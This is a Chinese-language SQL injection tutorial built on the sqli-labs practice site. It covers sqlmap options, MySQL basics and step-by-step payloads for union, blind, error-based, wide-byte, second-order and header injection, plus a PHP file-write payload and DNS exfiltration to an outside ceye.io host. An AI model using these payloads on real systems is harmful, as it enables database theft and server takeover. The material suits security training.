0x01 sqlmap
sqlmap是一个开源渗透测试工具,它可以自动检测和利用SQL注入缺陷,并接管数据库服务器。它配备了强大的检测引擎,为最终渗透测试提供了许多细分功能,以及广泛的交换机,从数据库指纹、从数据库获取数据,到访问底层文件系统和通过带外连接在操作系统上执行命令。
sqlmap是一个自动化注入工具,能判断存在注入点的参数,能够识别存在哪些类型的注入 5种,并能识别出对方是什么数据库,能根据用户选择,读取哪些数据。
常见命令
-u #注入点 -g 谷歌搜索 -f #指纹判别数据库类型 -b #获取数据库版本信息 -p #指定可测试的参数(?page=1&id=2 -p “page,id”) -D “” #指定数据库名 -T “” #指定表名 -C “” #指定字段 -s “” #保存注入过程到一个文件,还可中断,下次恢复在注入(保存:-s “xx.log” 恢复:-s “xx.log” –resume) –columns #列出字段 –current-user #获取当前用户名称 –current-db #获取当前数据库名称 –users #列数据库所有用户 –passwords #数据库用户所有密码 –privileges #查看用户权限(–privileges -U root) -U #指定数据库用户 –dbs #列出所有数据库 –tables -D “” #列出指定数据库中的表 –columns -T “user” -D “mysql” #列出mysql数据库中的user表的所有字段 –dump-all #列出所有数据库所有表 –exclude-sysdbs #只列出用户自己新建的数据库和表 –dump -T “” -D “” -C “” #列出指定数据库的表的字段的数据(–dump -T users -D master -C surname) –dump -T “” -D “” –start 2 –top 4 # 列出指定数据库的表的2-4字段的数据 –dbms #指定数据库(MySQL,Oracle,PostgreSQL,Microsoft SQL Server,Microsoft Access,SQLite,Firebird,Sybase,SAP MaxDB) –os #指定系统(Linux,Windows) --sql -shell 写shell --delay 延迟的时间
探测等级参数:—level
(有五个等级,默认为1级)
参数影响使用哪些payload同时也会影响测试的注入点,GET和POST的数据都会测试
0:只显示Python的tracebacks信息、错误信息[ERROR]和关键信息[CRITICAL] 1:同时显示普通信息[INFO]和警告信息[WARNING] 2:同时显示调试信息[DEBUG] 3:同时显示注入使用的攻击荷载 4:同时显示HTTP请求 5:同时显示HTTP响应头 6:同时显示HTTP响应体
风险等级参数:—risk
2会增加基于事件的测试语句
3会增加OR语句的SQL注入测试
有时在UPDATE的语句中,注入一个OR的测试语句,可能导致更新的整个表造成很大的风险
文件操作
手工操作
读取文件
load_file()
payload:
?id=-1' union select 1,2,load_file('D:/phpstudy/PHPTutorial/WWW/sqli-labs-master/Less-1/index.php')—+
写入文件
into outfile()
payload:
?id=-1' union select 1,'<?php phpinfo();?>',3 into outfile 'D:/phpstudy/PHPTutorial/WWW/test.php'--+
利用sqlmap操作
读取文件
--file-read #读取文件,相当于load_file()
payload:
load_file() payload: ?id=-1' union select 1,2,load_file('D:/phpstudy/PHPTutorial/WWW/sqli-labs-master/Less-1/index.php')—+
写入文件
--file-write #写入文件,相当于 into outfile
--file-dest #写入文件的存放路径
into outfile() payload: sqlmap.py -u "http://127.0.0.1/sqli-labs-master/Less-1/?id=1" --file-write "D:/phpstudy/PHPTutorial/WWW/test.php" --file-dest
0x02 mysql
定义
- 数据库 :是一些有关联的表的组合
- 表:由一定字段和记录组成
- 字段:一个数据项 Field
- 记录:一条对应字段的记录
- 主键:主键是唯一的,一个数据表中只能包含一个主键,可使用主键来查询数据
- 外键:外键用于关联两个表
- 索引:使用索引可快速访问数据库表中的特定信息,索引是对数据库表中一列或多列的值进行排序的一种结构。
SQL分类
- DDL(Data Definition Language) 数据定义语言:用来操作数据库、表、列等
- DML(Data Manipulation Language) 数据操作语言:用来操作数据库中表里的数据
- DCL(Data Control Language) 数据控制语言:用来操作访问权限和安全级别
- DQL(Data Query Language) 数据查询语言:用来查询数据
DDL:数据定义语言
创建数据库
create database 数据库名字 character set 字符集;
修改数据库
alter database 数据库名字 character set 字符集;
查看数据库
show databases;
删除数据库
drop database 数据库名;
创建表
create table 表名 ( 字段1名 数据类型 是否主键 是否默认,或者不为空 , 字段2名 数据类型 是否主键 是否默认,或者不为空 , ... 字段N名 数据类型 是否主键 是否默认,或者不为空 );
删除表
drop table 要删除的表名;
修改表名
alter table 要改的表名 to 新表名;
查看表
show tables;
查看表的字段信息
desc 表名;
添加一个字段
alter table 要改的表 add 字段名 数据类型;
删除一个字段
alter table 要改的表 drop 要删的字段名;
删除表
drop table 要删除的表名;
删除一条记录
delete from 表名 where 字段=值;
DML:数据操作语言
查询表中所有数据
select * from 你要查的表;
插入表中数据
单个插入
insert into 你要插入的表名 (字段4,字段N) value (值); insert into 你要插入的表名 value(值1,值N);
更新操作
update 表名 set 列名=列值; update 要更新的表名 set 字段n=变值, 字段m=变值 where 不变的字段 = 不变的值;
删除操作
delete from 表名 where 要删除的列名 = 要删除的值; delete from 表名;
delete与truncate的区别
- delete 是DML操作,这个操作会放到事务中,只有在事务提交之后才能生效,支持事务的回滚。truncate 和
- drop 是DDL操作,操作会立即生效,操作不放到事务中,不能回滚。
模糊查询
_ (代表任意一个字符) % (代表0....N个字符)
聚合函数(以下给出的都是常用函数)
- Count():统计指定列表不为 null 的记录行数
- max():计算指定列的最大值,如果指定列是字符串类型,那么使用字符串排序运算
- Min():计算指定列的最小值,如果指定列是字符串类型,那么使用字符串排序运算
- Sum():计算指定列的数值和,如果指定列类型不是数值类型,那么计算结果为0
- Avg():计算指定列的平均值,如果指定列类型不为数值类型,那么计算结果为0
LIMIT语句
limit子句用于限制查询结果返回的数量。
select * from tablename limit 参数1,参数2;
- tablename:要查询的表名;
- 参数1:查询结果的索引值,从哪一行开始(默认从0开始);
- 参数2:查询结果返回数量,一共查多少行;
合并结果集
UNION 指令的目的是将两个 SQL 语句的结果合并起来,合并时去除重复记录
select * from tablename1 UNION select * from tablename2;
合并时不去除重复记录
select * from tablename1 UNION ALL select * from tablename2;
被合并的两个结果:列数、列类型必须相同。
子查询
一个select语句中包含另一个完整的select语句,或两个以上select
- where后:把select查询出的结果当作另一个select的条件值
- from后:把查询出的结果当作一个新表
0x03 常用数据库默认端口号
- mysql的默认端口是3306
- sqlserver默认端口号为:1433
- oracle 默认端口号为:1521
- DB2 默认端口号为:5000
- PostgreSQL默认端口号为:5432
0x04 information_schema数据库表说明
information_schema数据库是MySQL系统自带的数据库,它提供了数据库元数据的访问方式。Mysql大于5.0以上的版本的数据库中,会存在一个information_schema数据库。
这个库中保存了整个Mysql中的所有信息,包括所有库,所有表,所有数据,可以把它理解为一个信息数据库。
- SCHEMATA表:提供了当前mysql实例中所有数据库信息,show databases的结果就是取自该表。
- TABLES表:提供了关于数据库中的表的信息。
- COLUMNS表:提供了表中的列信息,详细表述了某张表的所有列以及每个列的信息。
0x05 sql注入常用函数
current_user() 当前用户名 session_user() 链接数据库的用户名 @@basedirmysql 安装路径 @@datadir 数据库路径 @@version_compile_os 操作系统版本
字符串链接函数
concat、concat_ws、group_concat
concat(str1, str2,...)
返回结果为连接参数产生的字符串,如果有任何一个参数为null,则返回值为null
select concat(id,'|',username,'|',password) from users;
concat_ws(separator, str1, str2, ...)
第一个参数指定分隔符,分隔符不能为null,如果为null,则返回结果为null
select concat_ws('|',id,username,password) from users;
group_concat( [distinct] 要连接的字段 [order by 排序字段 asc/desc] [separator '分隔符'])
可以排除重复值;如果希望对结果中的值进行排序
select id,group_concat(score SEPARATOR ';') from testgroup group by id;
字符串截取函数
substr、mid、left、right、locate
mid(column_name,start[,length])
- column_name:要提取字符的字段
- start:规定开始位置(起始值是 1)
- length:要返回的字符数
select mid('martin',2,3);
和mid()函数的用法一样
select substr((select username from users limit 0,1),1,2);
left(a,b):从左侧截取 a 的前 b 位
select left('martin',2);
right(a,b):从右侧截取 a 的前 b 位
select right('martin',2);
locate:返回第一个字符串首次在第二个字符串出现得位置
select locate('security','1234security');
返回指定的ASCII字符对应的值
ascii、ord
ascii 返回字符串str的最左面字符的ASCII代码值。如果str是空字符串,返回0。如果str是NULL,返回NULL
select ascii('a');
ord 函数返回字符串第一个字符的ASCII 值
select ord('a');
返回指定数字对应的ascii码字符函数:
select char(97);
计算相关
length、count
length(str)
mysql里面的length()函数是一个用来获取字符串长度的内置函数
select length(database());
count() 是一个聚合函数,对于返回的结果集,一行行地判断,如果 count 函数的参数不是 NULL,累计值就加 1,否则不加。最后返回累计值。
select count(*) from users;
时间盲注会用到的函数
sleep、if
select sleep(5); select if((locate('s',database(),1)=1),sleep(5),1); if(expr1,expr2,expr3) 当expr1为真时,执行expr2 当expr1为假时,执行expr3
0x06 mysql注入原理
SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令
SQL注入的危害
- 数据库信息泄露
- 数据库被恶意操作
- 服务器被远程控制
- 网页篡改等
mysql注入检测方式
字符型判断
判断某URL是否存在注入
url: http://127.0.0.1/sqli-labs-master/Less-1/?id=1 后端sql:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
A.一般在传参后面加一个单引号或者双引号,报错或者没有返回正常的页面,大概率存在注入的,如
http://127.0.0.1/sqli-labs-master/Less-1/?id=1'
把id的值 1'传入后端过后,没有对ID过滤,导致查询语句变成
$sql="SELECT * FROM users WHERE id='1'' LIMIT 0,1";
两个单引号构成了闭合,而1后面的这个单引号多出来了,所以执行SQL会报错。
报错就证明我们构造的单引号'被带入到数据库中做了查询了,这就是SQL注入。而且在代码中打印了错误。对于有些网站没有打印错误的,可以根据页面是否返回正常来判断是否被带入SQL执行。
B.进一步检测是否存在注入
用 and/or 来判断
?id=1 and 1=1 正常 ?id=1 and 1=2 正常 ?id=1’and 1=1 --+ 正常 ?id=1’and 1=2 --+ 错误
其中 --是mysql注释符,加号为空格
mysql的注入符为 -- (杠杠空格),而空格替换成+号,浏览器会对+号urldecode成空格。
通过注释符注释掉后面多出来的内容,变成
$sql="SELECT * FROM users WHERE id='1'and 1=2 --+' LIMIT 0,1”;
这样就能够判断出,传入的恶意语句确实被带入到数据库中做了查询。
?id=1 or 1=1 正常 ?id=1 or 1=2 正常 ?id=-1’ or 1=1 --+ 正常 ?id=-1’ or 1=2 --+ 错误
只要满足一个条件,便可以执行成功,我们首先让ID=-1,而数据库中大概率不存在ID等于-1的数据,所以可以用or来判断。
通过以上步骤,判断出来的这种注入类型为字符型注入
?id=1'and '1'='1 ?id=1'and '1'='2
带入到源码中sql语句就是
SELECT * FROM users WHERE id='1 ' and '1' ='1' LIMIT 0,1 SELECT * FROM users WHERE id='1 ' and '1' ='2' LIMIT 0,1
数字型判断
更改id数字的大小及and 1=1 and 1=2可判断是否存在注入。
?id=1-1 返回为空 ?id=2-1 会返回id=1的界面 ?id=1 and 1=1 返回正常 ?id=1 and 1=2 返回错误
搜索型判断
有的一些搜索请求,也会存在注入,多见于一些源码类似如下:
$sql="select * from user where password like '%$pwd%' order by password";
like 用于搜索匹配字段中的内容
如果用户这样去输入
xx'and 1=1 and '%'='
那么传入到源码中的sql会变成
select * from user where password like '%xx'and 1=1 and '%'='%' order by password
则会存在sql注入的。
搜索型注入判断
'and 1=1 and '%'=' %' and 1=1--' %' and 1=1 and '%’='
0x07 sql注入类型
union注入
使用union合并两个或多个select语句的结果集,两个及以上的select必须有相同列、且各列的数据类型也都相同,使用联合查询进行注入的前提是要进行注入的页面必须有显示位。
联合查询注入可在链接最后添加 order by 基于随意数字的注入,根据页面的返回结果来判断站点中的字段数目
- 判断是否存在注入
- 判断注入类型:字符型/数字型/搜索型
- 通过order by 进一步判断字段数
?id=1' order by 3 %23 正常 ?id=1' order by 4 %23 报错
- 在显示位替换成一些MYsql的函数。
?id=-1' union select 1,2,3 %23 ?id=-1' union select 1,database(),version() %23
- 读取当前库中的表
?id=-1' union select 1,group_concat(' ',table_name),3 from information_schema.tables wheretable_schema=database() %23
- 取表中字段
?id=-1' union select 1,group_concat(' ',column_name),3 from information_schema.columns where table_schema=database() and table_name='users' %23
- 取数据
?id=-1' union select 1,group_concat(' ',username),group_concat(' ',password) from users %23
布尔盲注
布尔盲注就是注入后根据页面返回值来得到数据库信息的一种办法,适用于web的页面返回值都是True或者False
在union注入用不了,没有显示位置,只能根据页面是否返回true或者false来判断是否被带入查询。
- 判断是否存在注入
- 判断注入类型:字符型/数字型/搜索型
- 判断能使用的注入方式,不能使用union注入
?id=1' and 1=1 %23 页面回显正常 ?id=1' and 1=2 %23 页面回显不正常
证明存在盲注
- 获取数据库名称的长度
?id=1' and (length(database())>7) %23 回显正常 ?id=1' and (length(database())>8) %23 回显不正常
证明数据库名称长度为7位
- 获取数据库的名称
?id=1' and (ascii(substr(database(),1,1)) >110) %23 回显正常 ?id=1' and (ascii(substr(database(),1,1)) >120) %23 回显不正常 ?id=1' and (ascii(substr(database(),1,1)) >115) %23 回显不正常 ?id=1' and (ascii(substr(database(),1,1)) >114) %23 回显正常
大于114,不大于115,证明当前使用的数据库名称第一位的ascii值为115。所以查看asscii表得知为 字符 s
- 获取表数量
?id=1' and (select count(*) from information_schema.tables where table_schema='security') >5--+ 回显错误 ?id=1' and (select count(*) from information_schema.tables where table_schema='security') >4--+ 回显正常
- 获取表的长度
?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) >110)--+ 回显错误 ?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) >100)--+ 回显正常 ?id=1' and (ord(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 101)--+ 回显不正常
那么当前security库的第一张表的第一个字符的ascii值为101,转换为字符就是 e
时间盲注
就是我们根据web页面相应的时间差来判断该页面是否存在SQL注入点,当布尔型注入页面没有正常显示的时候,我们很难判断注入的代码是否被执行,基于时间的盲注便应运而生。
- 判断是否存在注入
- 判断注入类型:字符型/数字型/搜索型
- 判断能使用的注入方式
?id=1' and 1=1 %23 页面回显正常 ?id=1' and 1=2 %23 页面回显正常 ?id=1' and sleep(5) %23
页面延迟了5秒钟响应,证明sleep被带入到数据库做了查询
- 获取数据库名称的长度
?id=1' and if((length(database())>7),sleep(5),1) %23 延时5秒 ?id=1' and if((length(database())>8),sleep(5),1) %23 不延时5秒
证明数据库名称长度为7位
- 获取数据库的名称
?id=1' and if((ascii(substr(database(),1,1)) >110),sleep(5),1) %23 延时5秒 ?id=1' and if((ascii(substr(database(),1,1)) >120),sleep(5),1) %23 不延时5秒 ?id=1' and if((ascii(substr(database(),1,1)) >115),sleep(5),1) %23 不延时5秒 ?id=1' and if((ascii(substr(database(),1,1)) >114),sleep(5),1) %23 延时5秒
大于114,不大于115,证明当前使用的数据库名称第一位的ascii值为115。所以查看asscii表得知为 字符 s
- 获取表数量
?id=1' and if((select count(*) from information_schema.tables where table_schema=database()) >4,sleep(5),1)--+ 延时5秒 ?id=1' and if((select count(*) from information_schema.tables where table_schema=database()) >5,sleep(5),1)--+ 不延时5秒
说明表的数量为5张
DNSlog盲注
可以减少发送的请求,直接回显数据实现注入
利用条件
mysql.ini中secure_file_priv必须为空 secure_file_priv 为null 不允许导入导出 secure_file_priv 为/tmp 导入导出只能在/tmp目录下 secure_file_priv 为空时 则不做限制允许导入导出 payload: ?id=1' and load_file(concat('\\\\',(select database()),'.27epx0.ceye.io\\abc'))--+
替换select database()查询语句可以实现DNS外带的回显注入
报错注入
报错注入就是利用数据库的某些机制,人为地制造错误条件,使得查询结果能够出现在错误信息中。
报错注入也称之为公式化注入方式
报错注入利用函数1
updatexml() update(目标xml文档,xml路径,更新内容) payload: ?id=1' and (updatexml(1,concat(0x7e,(select user()),0x7e),1));—+
- 0x7e是ascii编码,解码为 ~
- updatexml() 是更新xml文档的函数
xml文档中查找字符串位置是用/xx/xx...,写入其他格式会报错
- 更改select user()位置的sql语句
- 获取当前库的表
?id=1' and (updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1))--+
获取当前库的第一张表
- 获取某表字段
?id=1' and (updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),0x7e),1))--+
获取emails表的第一个字段
报错注入利用函数2:
extractvalue() extractvalue() :对XML文档进行查询的函数 extractvalue(目标xml文档,xml路径) payload: ?id=1' and (extractvalue(1,concat(0x7e,(select user()),0x7e))) —+ ?id=1' and (extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e)))--+获取当前库的第一张表,只需更改limit的位置 ?id=1' and (extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() and table_name='emails' limit 0,1),0x7e)))--+ 获取字段
报错注入利用函数3:
floor()
向下取整,返回整数,返回不大于X的最大整数值
payload: ?id=1' and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a) --+
利用主键重复,因为floor(rand(0)*2)的重复性,导致group by语句出错
group by key:循环读取数据的每一行,将结果保存于临时表中。
读取每一行的key时,如果key存在于临时表中,则不在临时表中更新临时表的数据;如果key不在临时表中,则在临时表中插入key所在行的数据。
宽字节注入
gbk编码方式需要两个ascii码组合来解码
当传递一个参数时,输入单引号 id = 1',会被过滤函数添加“\”给过滤掉,因为被认为是非法字符
当http协议传输时,经过url编码传递到服务器,在单引号前加上一个%81这样得编码,最后这样解码得时候,这个%81就会和“/”对应得编码相结合按照gbk编码要求去解码,最后只剩下个单引号
?id=1%81' 单引号前面加%81,构成宽字节,若报错转义过后的\被吃掉。 ?id=1%81' and 1=1 --+ 回显正常 ?id=1%81' and 1=2 --+ 回显不正常 ?id=1%81' order by 3 --+ 回显正常 ?id=1%81' and 1=2 union select 1,2,3 --+ 显示位 2,3
二次注入
指已存储(数据库、文件)的用户输入被读取后再次进入到 SQL 查询语句中导致的注入。二次注入是sql注入的一种,但是比普通sql注入利用更加困难,利用门槛更高。普通注入数据直接进入到 SQL 查询中,而二次注入则是输入数据经处理后存储,取出后,再次进入到 SQL 查询
修改账户为admin的密码
payload: 后端源码:$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' "; 新建用户admin’# $sql = "UPDATE users SET PASSWORD='$pass' where username='admin’#' and password='$curr_pass' ";
重置账户密码,输入名字 admin’#,修改过后发现被修改的账户为admin
http头注入
后台开发人员为了验证客户端头信息或者通过http header头信息获取客户端的一些资料时会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的SQL Inject漏洞。
1. user-agent处加单引号报错 2. $insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)”; 3. user-agent处1' and '1'='1 构造闭合 4. user-agent处1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'=‘1 5. insert into uagents(uagent,ip_address,username) values('1' and updatexml(1,concat(0x7e,(select user()),0x7e),1) and '1'='1','127.0.0.1','admin’);